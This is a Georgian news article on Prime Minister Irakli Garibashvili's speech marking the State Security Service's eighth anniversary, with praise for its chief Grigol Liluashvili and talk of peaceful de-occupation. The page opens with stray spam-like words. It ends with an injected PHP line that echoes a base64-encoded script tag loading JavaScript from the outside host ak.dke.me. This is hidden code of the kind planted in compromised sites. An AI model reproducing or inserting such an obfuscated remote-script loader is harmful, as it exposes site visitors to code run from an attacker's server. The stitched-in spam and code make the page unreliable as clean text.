celsiusi
ავერსი შნაიდერი

მჯერა, ჩვენი სწორი, პრაგმატული, შედეგზე გათვლილი პოლიტიკის შედეგად, ჩვენი ქვეყანა მოახერხებს მშვიდობიან დეოკუპაციას და ჩვენი ქვეყნის გაერთიანებას, გამთლიანებას. ჩვენი და სახელმწიფო უსაფრთხოების  სამსახურის მთავარი საზრუნავი არის სწორედ ეს, – ამის შესახებ საქართველოს პრემიერ-მინისტრმა ირაკლი ღარიბაშვილმა სახელმწიფო უსაფრთხოების სამსახურის დაარსების დღისადმი მიძღვნილ ღონისძიებაზე სიტყვით გამოსვლისას განაცხადა.

როგორც ირაკლი ღარიბაშვილმა აღნიშნა, სამსახურის დაფუძნებიდან რვა წელი გავიდა და მას შემდეგ სამსახურმა ძალიან მნიშვნელოვანი რეფორმები ჩაატარა, განახორციელა, ჩამოყალიბდა როგორც დამოუკიდებელი, ეფექტიანი სისტემა, სამსახური, რომელიც იცავს მოქალაქეების უსაფრთხოებას და აძლიერებს სახელმწიფოს, იცავს სახელმწიფოს ინტერესებს.

მთავრობის მეთაურმა მადლობა გადაუხადა გრიგოლ ლილუაშვილს და სამსახურის თითოეულ თანამშრომელს და ხაზი გაუსვა, თუ რაოდენ დიდი მნიშვნელობა აქვს სახელმწიფო უსაფრთხოების სამსახურის ეფექტიან მუშაობას.

„მინდა, კიდევ ერთხელ ჩვენი მთავრობის სახელით მადლობა გადავუხადო ბატონ გრიგოლ ლილუაშვილს. მისი ხელმძღვანელობის პერიოდში ეს სამსახური კიდევ უფრო სხვა დონეზე გადავიდა, მისი ხელმძღვანელობის პერიოდში ძალიან ბევრი მნიშვნელოვანი რეფორმა განხორციელდა, რითაც სამსახური კიდევ უფრო მეტად გაძლიერდა. ამისთვის მადლობა თქვენ, ბატონო გრიგოლ, და თქვენს ხელმძღვანელობას, ყველას მინდა მადლობა გადავუხადო, თითოეულ თქვენს თანამშრომელს. მე ასევე მინდა აღვნიშნო და ამის თაობაზე ბატონმა გრიგოლმა ვრცლად ისაუბრა, თუ რაოდენ დიდი მნიშვნელობა აქვს ამ სამსახურის ეფექტიან მუშაობას. თქვენი როლი არის ერთ-ერთი გადამწყვეტი, მე ასე ვიტყოდი, ვინაიდან თქვენ ახდენთ საფრთხეების შეფასებას, იდენტიფიცირებას, როგორც შიდა, ისე გარე საფრთხეების გამოვლენას, პრევენციასა და აღკვეთას. ასევე ეს სამსახური ებრძვის ტერორიზმს, კორუფციას და, რაც მთავარია, კიდევ მინდა გავიმეორე, უმაღლეს დონეზე იცავს ჩვენი მოქალაქეების უსაფრთხოებას,“- განაცხადა პრემიერმა. ირაკლი ღარიბაშვილის თქმით, დღეს ქვეყანა და, ზოგადად, რეგიონი დიდი გამოწვევის წინაშეა. მისივე განცხადებით, ასეთ ვითარებაში მთავრობისა და სახელმწიფო უსაფრთხოების სამსახურის როლი არის მშვიდობისა და სტაბილურობის შენარჩუნება. „მოგეხსენებათ, ჩვენ დღეს ძალიან დიდი გამოწვევის წინაშე ვიმყოფებით, – ჩვენი ქვეყანა, მთელი რეგიონი. მეორე მსოფლიო ომის დასრულების შემდეგ, ასეთი გამოწვევა არ უნახავს ევროპის კონტინენტს და, ზოგადად, მთელი მსოფლიო წესრიგი არის ძალიან დიდი გამოწვევის წინაშე. ასეთ ვითარებაში სახელმწიფოს, ჩვენი მთავრობისა და ამ სამსახურის პირდაპირი როლი, რა თქმა უნდა, არის მშვიდობისა და სტაბილურობის შენარჩუნება. მოგეხსენებათ, და თავის გამოსვლაში ეს ბატონმა გრიგოლმა სწორად ახსნა და აღნიშნა, – მიუხედავად არაერთი მცდელობისა, პროვოკაციული და დესტრუქციული მოქმედებებისა, ჩვენმა ხელისუფლებამ შეინარჩუნა მშვიდობა, სტაბილურობა და, რაც მთავარია, ჩვენ სწრაფად ვზრდით ქვეყნის ეკონომიკას, რაც პირდაპირ აისახება ჩვენი მოსახლეობის, მოქალაქეების კეთილდღეობაზე. მოგეხსენებათ, რომ საფრთხეები არის მრავალგანზომილებიანი, გვიწევს გამკლავება ჰიბრიდულ საფრთხეებთან, გვიწევს გამკლავება ოკუპაციასთან და ოკუპაციის თანამდევ რისკებთან, რომელიც თან ახლავს ოკუპაციას ზოგადად. ყოველდღიურ რეჟიმში ეს სამსახური იცავს ჩვენი მოქალაქეების უსაფრთხოებას, ამავე დროს ჩვენ შევძელით და ბოლო 10 წელზე მეტია მოვახერხეთ ის, რომ მიუხედავად ამ გამოწვევებისა, რომელიც თან ახლავს ოკუპაციას, ჩვენ შევინარჩუნეთ მშვიდობა, სტაბილურობა,“- განაცხადა პრემიერმა.

მისივე თქმით, ეს არის ერთადერთი მშვიდობიანი პერიოდი, როცა ქვეყანას არ დაუკარგავს ტერიტორიები, არ ყოფილა ომი და რაიმე სერიოზული კონფლიქტი ან გამოწვევა, რაც, რა თქმა უნდა, არის ხელისუფლების სწორი ხედვისა და სწორი პოლიტიკის შედეგი, რომელსაც ალტერნატივა არა აქვს.

„ეს არის ერთადერთი მშვიდობიანი პერიოდი, როცა ქვეყანას არ დაუკარგავს ტერიტორიები, არ ყოფილა ომი და რაიმე სერიოზული კონფლიქტი ან გამოწვევა, რაც, რა თქმა უნდა, არის ჩვენი ხელისუფლების სწორი ხედვისა და სწორი პოლიტიკის შედეგი, რომელსაც ალტერნატივა არა აქვს. ჩვენ კარგად მოგვეხსენება, რომ ძალიან ბევრი მცდელობა იყო იმისა, რომ საქართველო გამოყენებული ყოფილიყო როგორც ინსტრუმენტი ცალკეული ქვეყნების წინააღმდეგ თუ სასარგებლოდ. ჩვენი მთავარი დევიზი არის ჩვენი ქვეყნის ეროვნული ინტერესების დაცვა და არა სხვა ქვეყნების ინტერესების მსახურება. მე მინდა ხაზგასმით აღვნიშნო ეს. იმიტომ, რომ ჩვენ ბოლო პერიოდი, 10 წელზე მეტია, ვაძლიერებთ ჩვენი ქვეყნის სუვერენიტეტს და არა სხვა ქვეყნების სუვერენიტეტს. ეს არის ძალიან მნიშვნელოვანი. მე მინდა განსაკუთრებული მადლიერებით აღვნიშნო თქვენი მაღალი პროფესიონალიზმი და თქვენი პატრიოტიზმი. ეს არის ის, რაც სჭირდება ამ სამსახურს – პროფესიონალიზმი და პატრიოტიზმი. ამისთვის კიდევ ერთხელ მადლობას გიხდით ჩვენი მთავრობის სახელით. მე მჯერა, ამ გეოპოლიტიკურ კრიზისებს და, ზოგადად, ამ მიმდინარე საფრთხეებს ჩვენი ქვეყანა თავიდან აიცილებს. ჩვენ უნდა გავიყვანოთ ჩვენი სახელმწიფო სამშვიდობოს, ჩვენ უნდა დავიცვათ ჩვენი მოქალაქეების ინტერესები. ასევე მინდა აღვნიშნო, რომ დღეს საქართველო განსაკუთრებული ტემპებით ვითარდება. ჩვენ დღეს ერთ-ერთი ყველაზე სწრაფად მზარდი ეკონომიკა ვართ მთელ მსოფლიოში. ჩვენ ასევე ვავითარებთ ჩვენს ურთიერთობებს როგორც სამეზობლოში, ისე ყველა წამყვან დიდ ეკონომიკებთან. აუცილებელია ჩვენი ინტერესების გატარება. თითოეული ჩვენ მიერ გადადგმული ნაბიჯი მხოლოდ ჩვენი ქვეყნის ინტერესების გატარებას ემსახურება. ასევე ჩვენი ქვეყნის რეგიონული და საერთაშორისო როლი და მნიშვნელობა დღითი დღე იზრდება. ამას სჭირდება წახალისება, შენარჩუნება და კიდევ უფრო გაძლიერება. მე მჯერა ჩვენი სწორი, პრაგმატული, შედეგზე გათვლილი პოლიტიკის შედეგად ჩვენი ქვეყანა მოახერხებს მშვიდობიან დეოკუპაციას და ჩვენი ქვეყნის გაერთიანებას, გამთლიანებას. ამაზე უზენაესი ეროვნული ინტერესი დღეს ქვეყანაში არ არსებობს. ჩვენი მთავარი საზრუნავი, ამ სამსახურის, არის სწორედ ეს, იმ ყოველდღიურ საქმიანობასთან ერთად, რომელსაც თქვენ ახორციელებთ, და ჩვენი მოქალაქეების, მთელი სახელმწიფო უწყებების და ჩვენი მოქალაქეების ინტერესი უნდა იყოს სწორედ ამ დიადი მიზნის მიღწევა. ამას, რა თქმა უნდა, სჭირდება წარსულში ჩადენილი ძალიან ბევრი უხეში შეცდომისა თუ დანაშაულების გამოცდილების გათვალისწინება, გააზრება კარგად, ემოციების გარეშე და თანამიმდევრულად მიყოლა ჩვენი ეროვნული პოლიტიკის. სამსახურს სჭირდება კიდევ უფრო მეტი დაფასება, მეტი დახმარება, მეტი გაძლიერება. ბატონო გრიგოლ, ჩვენი ვალდებულებაა, ჩემი ვალდებულებაა, რომ კიდევ უფრო მეტი გავაკეთო თქვენთვის, იმისთვის, რომ თქვენი ყოველდღიური საქმიანობა იყოს უფრო მეტად დაცული, გაძლიერებული, დაფასებული, და მე გპირდებით მომავალშიც სრულ თანადგომას. კიდევ ერთხელ, ბატონო გრიგოლ, მინდა გულწრფელი მადლობა გადაგიხადოთ თქვენ და თქვენი სამსახურის თითოეულ თანამშრომელს და გისურვოთ წარმატება და გამარჯვება“, – განაცხადა პრემიერმა.

ღონისძიების მონაწილეებმა წუთიერი დუმილით პატივი მიაგეს სამსახურებრივი მოვალეობის შესრულების დროს დაღუპულ თანამშრომლებს. სტუმრებს სიტყვით მიმართეს სახელმწიფო უსაფრთხოების სამსახურის უფროსმა გრიგოლ ლილუაშვილმა და საქართველოს პარლამენტის თავმჯდომარემ შალვა პაპუაშვილმა. სახელმწიფო უსაფრთხოების სამსახურის შექმნის მე-8 წლისთავთან დაკავშირებით, სუს-ის უფროსმა გრიგოლ ლილუაშვილმა სამსახურის თანამშრომლები დააჯილდოვა.

247
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");